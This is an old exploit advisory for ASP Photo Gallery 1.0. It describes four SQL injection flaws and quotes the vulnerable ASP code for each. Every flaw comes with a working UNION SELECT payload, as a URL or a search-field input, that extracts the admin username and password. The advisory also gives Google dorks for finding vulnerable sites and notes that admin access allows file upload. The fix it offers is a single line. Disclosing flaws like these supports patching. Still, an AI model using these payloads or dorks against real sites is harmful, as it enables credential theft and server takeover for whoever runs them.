######################################################################
#
# ASP Photo Gallery 1.0 - Multiple SQL Injection Vulnerabilities
#
# Date      : 12-january-2008
# Risk      : Medium
# Vendor URL    : http://www.matteobinda.com/apg.php
# Google Dork    : "download this free gallery at matteobinda.com"
#      : allinurl: imgbig.asp?id=
#
# Found By    : Ruben Ventura Piña (Trew)
# Contact Info    : http://trew.icenetx.net
#        trew.revolution@gmail.com
#        ICEnetX Team - http://icenetx.net
#
######################################################################
#
#  Greetings oh earthlings: 
#  Ayzax, BRIO, Gaper (All ICEnetX Team)
#  and to all people who likes H.I.M, lol.
#
#  "Maybe you can't break the system, but you can always hack it."
#
######################################################################
#
## Vulnerability ##
#
# "ASP Photo Gallery" is a free tool to create web galleries. It was
# written in ASP and uses an Access Database to store data.
# Input is not propperly santised, therefore the application has
# multiple SQL injection vulnerabilities.
#
# ---
# First bug:
# The following code in the Imgbig.asp file is vulnerable:
#  <% ...
#  nomefoto = request("Id")
#  ...
#  sql = "SELECT * FROM fotoinfo WHERE name='" & nomefoto & "'"
#  objrs.Open sql, objConn ,3,3
#  ... %>
#
# Input passed to the "Id" parameter is not santised. This can be
# exploited in the following manner to obtain the admin's password:
#
# http://[site]/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1
#
# ---
# Second bug:
# The following code in the thumbricerca.asp file is vulnerable:
#  <% ...
#  ricerca = Request.QueryString("id")
#  ...
#  sql = "SELECT * from fotoinfo where descrizione like '%" & ricerca & "%'  order by name desc"
#  objrs.Open sql, objConn ,3,3
#  ... %>
#
# Input passed to the "id" parameter is not santised. This can be
# exploited in the following manner to obtain the admin's password:
#
# /thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like '%
#
# ---
# Third bug:
# The following code in the thumbricerca.asp file is vulnerable:
#  <% ...
#  ricerca = request.form("ricerca")
#  ...
#  sql = "SELECT * from fotoinfo where descrizione like '%" & ricerca & "%'  order by name desc"
#  objrs.Open sql, objConn ,3,3
#  ... %>
#
# Input passed to the "ricerca" parameter is not santised. This can be
# exploited by inserting the following code into the search textfield
# located in the thumbricerca.asp file:
#  -1'union select user as name,1,pass as descrizione from stuff where 1 like '%
# --
# Fourth bug:
# The following code in the thumb.asp file is vulnerable:
#  <% ...
#  intCodice = request("id")
#  ...
#  sql = "SELECT * from fotoinfo where category ='" & intcodice & "' order by name desc"
#  objrs.Open sql, objConn ,3,3
#  ..%>
#
# Input passed to the "id" parameter is not santised. This can be exploited
# in the following manner to obtain the admin's password:
#
#  /thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1
#
#
# After an attacker has logged in into the admin panel (/admin/admin.asp), he'll have the
# possibility to upload files to the server.
#
#
## How to fix ##
#
# Santise all input which is then used in SQL queries.
#